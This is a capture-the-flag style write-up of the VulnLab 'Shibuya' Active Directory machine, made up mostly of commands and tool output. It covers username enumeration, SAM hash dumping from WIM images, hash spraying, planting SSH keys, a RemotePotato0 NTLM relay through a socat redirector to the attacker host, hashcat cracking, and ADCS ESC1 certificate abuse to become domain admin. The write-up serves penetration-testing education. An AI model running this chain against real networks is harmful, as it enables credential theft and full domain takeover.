Post

Shibuya

Posted Updated
Preview Image
By Tofig Orujov
14 min read

Shinbuya is a machine with medium difficulty that involves Active Directory (AD). First, we use Kerbrute to find valid usernames. After a few steps, we dump hashes from the registry, and finally, we escalate privileges to admin by running remote_potato0

I started with a classic Nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

➜   nmap -p- --min-rate 10000 10.10.105.26 -oN port.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-19 19:17 +04
Nmap scan report for 10.10.105.26
Host is up (0.14s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
9389/tcp  open  adws
49664/tcp open  unknown
49669/tcp open  unknown
60035/tcp open  unknown
60077/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.86 seconds

The SSH port was open, interesting, let’s keep that in mind. After poking around a bit (looking at null auth shares, etc.), we couldn’t find anything. As a last resort, we’re trying to find a valid username with Kerbrute.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

➜  Shibuya kerbrute userenum --dc 10.10.105.26 -d shibuya.vl /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 04/19/25 - Ronnie Flathers @ropnop

2025/04/19 19:41:17 >  Using KDC(s):
2025/04/19 19:41:17 >  	10.10.105.26:88

2025/04/19 19:41:19 >  [+] VALID USERNAME:	 purple@shibuya.vl
2025/04/19 19:41:21 >  [+] VALID USERNAME:	 red@shibuya.vl
^C

We found two usernames. While wondering if they used the same password, we realized we were right. However, we confirmed it was correct using the -k option. I think NTLM auth is disabled.

1
2
3
4
5
6

➜  Shibuya netexec smb shibuya.vl -u red -p red   
SMB         10.10.105.26    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.105.26    445    AWSJPDC0522      [-] shibuya.vl\red:red STATUS_LOGON_FAILURE 
➜  Shibuya netexec smb shibuya.vl -u red -p red -k
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

➜  Shibuya netexec smb shibuya.vl -u red -p red -k --users                                    
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red 
SMB         shibuya.vl      445    AWSJPDC0522      -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         shibuya.vl      445    AWSJPDC0522      _admin                        2025-02-15 07:55:29 0       Built-in account for administering the computer/domain 
SMB         shibuya.vl      445    AWSJPDC0522      Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         shibuya.vl      445    AWSJPDC0522      krbtgt                        2025-02-15 07:24:57 0       Key Distribution Center Service Account 
SMB         shibuya.vl      445    AWSJPDC0522      svc_autojoin                  2025-02-15 07:51:49 0       K5&<REDACTED>
SMB         shibuya.vl      445    AWSJPDC0522      Leon.Warren                   2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Graeme.Kerr                   2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Joshua.North                  2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Shaun.Burton                  2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Gillian.Douglas               2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Kelly.Davies                  2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Conor.Fletcher                2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Karl.Brown                    2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Tracey.Wood                   2025-02-16 10:23:34 0        
SMB         shibuya.vl      445    AWSJPDC0522      Mohamed.Brooks                2025-02-16 10:23:34 0

We saw that the password for the svc_autojoin user is in the description field, so let’s verify it.

1
2
3
4
5
6
7
8
9
10
11
12
13

➜  Shibuya netexec smb shibuya.vl -u svc_autojoin -p '<REDACTED>' --shares
SMB         10.10.88.177    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.88.177    445    AWSJPDC0522      [+] shibuya.vl\svc_autojoin:<REDACTED>
SMB         10.10.88.177    445    AWSJPDC0522      [*] Enumerated shares
SMB         10.10.88.177    445    AWSJPDC0522      Share           Permissions     Remark
SMB         10.10.88.177    445    AWSJPDC0522      -----           -----------     ------
SMB         10.10.88.177    445    AWSJPDC0522      ADMIN$                          Remote Admin
SMB         10.10.88.177    445    AWSJPDC0522      C$                              Default share
SMB         10.10.88.177    445    AWSJPDC0522      images$         READ            
SMB         10.10.88.177    445    AWSJPDC0522      IPC$            READ            Remote IPC
SMB         10.10.88.177    445    AWSJPDC0522      NETLOGON        READ            Logon server share 
SMB         10.10.88.177    445    AWSJPDC0522      SYSVOL          READ            Logon server share 
SMB         10.10.88.177    445    AWSJPDC0522      users           READ

The password was correct. While looking at the shares, the images share caught our attention.

1
2
3
4
5
6
7
8
9
10
11
12

➜  Shibuya smbclient -U svc_autojoin \\\\shibuya.vl\\images$                                                
Password for [WORKGROUP\svc_autojoin]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 16 15:24:08 2025
  ..                                DHS        0  Wed Feb 19 16:59:37 2025
  AWSJPWK0222-01.wim                  A  8264070  Sun Feb 16 15:23:41 2025
  AWSJPWK0222-02.wim                  A 50660968  Sun Feb 16 15:23:45 2025
  AWSJPWK0222-03.wim                  A 32065850  Sun Feb 16 15:23:47 2025
  vss-meta.cab                        A   365686  Sun Feb 16 15:22:37 2025

		6126847 blocks of size 4096. 1338307 blocks available

We found .wim files inside the images share. Honestly, I recognize these from the WDS server. They were used to automate the deployment of operating systems to computers. But the good part is, we can extract files from the .wim. Our immediate thought was to dump the hashes from the registry.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

➜  Shibuya 7z l AWSJPWK0222-01.wim | grep SAM

➜  Shibuya 7z l AWSJPWK0222-02.wim | grep SAM

2025-02-16 23:47:38 ....A            0            0  RegBack/SAM
2025-02-16 15:16:08 ....A        65536        14320  SAM
2021-05-08 12:06:51 ..HSA        65536         9960  SAM.LOG1
2021-05-08 12:06:51 ..HSA        49152         9502  SAM.LOG2
➜  Shibuya 7z l AWSJPWK0222-02.wim | grep SYSTEM

2021-05-08 12:06:51 ..HSA            0            0  SYSTEM.LOG1
2021-05-08 12:06:51 ..HSA            0            0  SYSTEM.LOG2
2025-02-16 23:47:38 ....A            0            0  RegBack/SYSTEM
2025-02-16 15:16:08 ....A     17039360      3632062  SYSTEM

We couldn’t find the file we wanted in 01, but it was in 02. We can start dumping from here. You could transfer it to Windows and use DISM. After some research, I found that we could also extract files using 7z, so I didn’t bother with the transfer.

1
2
3
4
5
6
7
8
9
10
11
12
13

➜  Shibuya 7z e AWSJPWK0222-02.wim SAM SYSTEM SECURITY

7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=C.UTF-8 Threads:4 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 50660968 bytes (49 MiB)

<strong>&#x3C;SNIP>
</strong>Files: 3
Size:       17137664
Compressed: 50660968
</code></pre>

1
2
3
4
5
6
7
8
9
10
11

➜  Shibuya impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x2e971736685fc53bfd5106d471e2f00f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8dcb5ed323d1d09b9653452027e8c013:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9dc1b36c1e31da7926d77ba67c654ae6:::
operator:1000:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

From here, we’re analyzing the hashes. Let’s not get excited when we see the Administrator hash, it’s not the hash for the machine we’re looking for. :) Let’s try the Operator hash.

1
2
3

➜  Shibuya netexec smb shibuya.vl -u operator -H <REDACTED>
SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.180    445    AWSJPDC0522      [-] shibuya.vl\operator:<REDACTED>STATUS_LOGON_FAILURE

Now, let’s use CrackMapExec to extract the users and try these hashes.

1

➜  Shibuya crackmapexec smb shibuya.vl -u svc_autojoin -p '<REDACTED>' --users --export $(pwd)/users.txt

1

➜  Shibuya  sed -i "s/'/\"/g" users.txt

1

➜  Shibuya jq -r '.[]' users.txt > userslist.txt

The userlist we saved is in single quotes and JSON format. We convert it to double quotes and write it as a wordlist, one entry per line. The issue here is that some names contain single quotes. We automatically convert those to double quotes, which is something we didn’t want, and unfortunately, I had to manually fix that.
For example, O’Donnel –> O”Donnel.

1
2

➜  Shibuya netexec smb shibuya.vl -u userslist.txt -H <REDACTED>--continue-on-success | grep +
SMB                      10.10.88.177    445    AWSJPDC0522      [+] shibuya.vl\Simon.Watson:<REDACTED>

Great, we found the simon.watson user. Then, we connect via SMB, create a .ssh folder in the users share, place the pub key there, and gain initial access.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

➜  Shibuya ssh-keygen -t rsa -b 4096 -f id_rsa_custom
Generating public/private rsa key pair.
Enter passphrase for "id_rsa_custom" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa_custom
Your public key has been saved in id_rsa_custom.pub
The key fingerprint is:
SHA256:rqj+0/IHufWFejbDxbr9X2qUqPWG5sXiWdML/xqacd0 user@kali
The key's randomart image is:
+---[RSA 4096]----+
|                 |
|                 |
|                 |
|                 |
|       .S  o . . |
|      o.. . *.oo.|
|     . +.+ *o=B E|
|    o.o.o XooX*+o|
| .ooo+o. o.*B++=+|
+----[SHA256]-----+

1

➜  Shibuya mv id_rsa_custom.pub authorized_keys

1
2
3
4
5
6
7
8
9
10
11

➜  Shibuya ssh -i id_rsa_custom simon.watson@shibuya.vl
The authenticity of host 'shibuya.vl (10.10.88.177)' can't be established.
ED25519 key fingerprint is SHA256:SiXhmjQMScl7eQgH4/uyVXXTsCHM6diy6fh80l4zzJQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shibuya.vl' (ED25519) to the list of known hosts.

Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

shibuya\simon.watson@AWSJPDC0522 C:\Users\simon.watson>

Since Defender is running on the machine, if you try to transfer SharpHound, the transfer will succeed without any issues, but you won’t be able to run it. You might try obfuscation methods here, but I used NetExec to do this.

1
2
3
4
5
6

➜  Shibuya proxychains -q nxc ldap shibuya.vl -u simon.watson -H <REDACTED>--bloodhound --dns-server 10.10.64.180 --dns-tcp -c All,session,loggedon 
SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
LDAP        10.10.64.180    389    AWSJPDC0522      [+] shibuya.vl\simon.watson:<REDACTED>
LDAP        10.10.64.180    389    AWSJPDC0522      Resolved collection methods: session, group, psremote, loggedon, container, trusts, dcom, objectprops, localadmin, rdp, acl
LDAP        10.10.64.180    389    AWSJPDC0522      Done in 00M 24S
LDAP        10.10.64.180    389    AWSJPDC0522      Compressing output into /home/user/.nxc/logs/AWSJPDC0522_10.10.64.180_2025-04-20_170058_bloodhound.zip

(I set up SSH tunneling, as you can see. Otherwise, I wouldn’t have been able to run the BloodHound module.)

According to the BloodHound data, the nigel.mills user had a session on the DC. We could have dumped the hashes using Mimikatz, but unfortunately, we have an issue with Defender. To bypass this, different methods can be used, and I used remote_potato0. It’s fairly simple to use, but it returns the hash in NTLMv2 format. We hope to crack it with hashcat.

Attacker machine:

1

➜  Shibuya sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.64.180:8001

Victim machine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

PS C:\Users\simon.watson> .\RemotePotato0.exe -m 2 -s 1 -x 10.8.6.29 -p 8001 
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 8001
[*] Example Network redirector: 
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP::8001
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 8001 ...
[*] IStoragetrigger written: 100 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 8001
[+] User hash stolen!

NTLMv2 Client   : AWSJPDC0522
NTLMv2 Username : SHIBUYA\Nigel.Mills
NTLMv2 Hash     : <REDACTED>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

➜  Shibuya hashcat -a 0 -m 5600 nigel.ntlmv2 /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-AMD Ryzen 9 6900HX with Radeon Graphics, 1438/2941 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386

NIGEL.MILLS::SHIBUYA:<REDACTED>:<REDACTED>
                                                          
Session..........: hashcat
Status...........: Cracked
<SNIP>
Stopped: Sun Apr 20 17:59:53 2025

We successfully cracked the hash.

1
2
3

➜  Shibuya netexec smb shibuya.vl -u nigel.mills -p <REDACTED>
SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.180    445    AWSJPDC0522      [+] shibuya.vl\nigel.mills:<REDACTED>

After poking around a bit, we decide to check ADCS using NetExec.

1
2
3
4
5
6

➜  Shibuya proxychains -q netexec ldap shibuya.vl -u nigel.mills -p <REDACTED>-M adcs
SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
LDAP        10.10.64.180    389    AWSJPDC0522      [+] shibuya.vl\nigel.mills:<REDACTED>
ADCS        10.10.64.180    389    AWSJPDC0522      [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.64.180    389    AWSJPDC0522      Found PKI Enrollment Server: AWSJPDC0522.shibuya.vl
ADCS        10.10.64.180    389    AWSJPDC0522      Found CN: shibuya-AWSJPDC0522-CA

Then we use Certipy to verify it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

➜  Shibuya proxychains -q certipy-ad find -username nigel.mills -password <REDACTED> -vulnerable -dc-ip 10.10.64.180 -stdout -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.64.180:636 - ssl
[+] Default path: DC=shibuya,DC=vl
[+] Configuration path: CN=Configuration,DC=shibuya,DC=vl
[+] Adding Domain Computers to list of current user's SIDs
[+] List of current user's SIDs:
 <SNIP>
    [!] Vulnerabilities
      ESC1                              : 'SHIBUYA.VL\\t1_admins' can enroll, enrollee supplies subject and template allows client authentication
      ESC2                              : 'SHIBUYA.VL\\t1_admins' can enroll and template can be used for any purpose
      ESC3                              : 'SHIBUYA.VL\\t1_admins' can enroll and template has Certificate Request Agent EKU set

Let’s send the request.

1
2
3
4
5
6
7
8
9
10
11

➜  Shibuya proxychains -q certipy-ad req -u Nigel.Mills@shibuya.vl -p <REDACTED>-ca shibuya-AWSJPDC0522-CA -target AWSJPDC0522.shibuya.vl -target-ip 10.10.64.180 -template ShibuyaWeb -upn '_admin@shibuya.vl' -key-size 4096 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
  "(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN '_admin@shibuya.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to '_admin.pfx'

1
2
3
4
5
6
7
8
9

➜  Shibuya proxychains -q certipy-ad auth -pfx '_admin.pfx' -dc-ip 10.10.64.180
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: _admin@shibuya.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to '_admin.ccache'
[*] Trying to retrieve NT hash for '_admin'
[*] Got hash for '_admin@shibuya.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

1
2
3
4
5

➜  Shibuya proxychains -q netexec smb shibuya.vl -u _admin -H <REDACTED>-x 'type c:\users\administrator\desktop\root.txt'
SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.180    445    AWSJPDC0522      [+] shibuya.vl\_admin:<REDACTED>(Pwn3d!)
SMB         10.10.64.180    445    AWSJPDC0522      [+] Executed command via wmiexec
SMB         10.10.64.180    445    AWSJPDC0522      VL{<REDACTED>}
VulnLab
kerbrute dumping remote_potat0
This post is licensed under CC BY 4.0 by the author.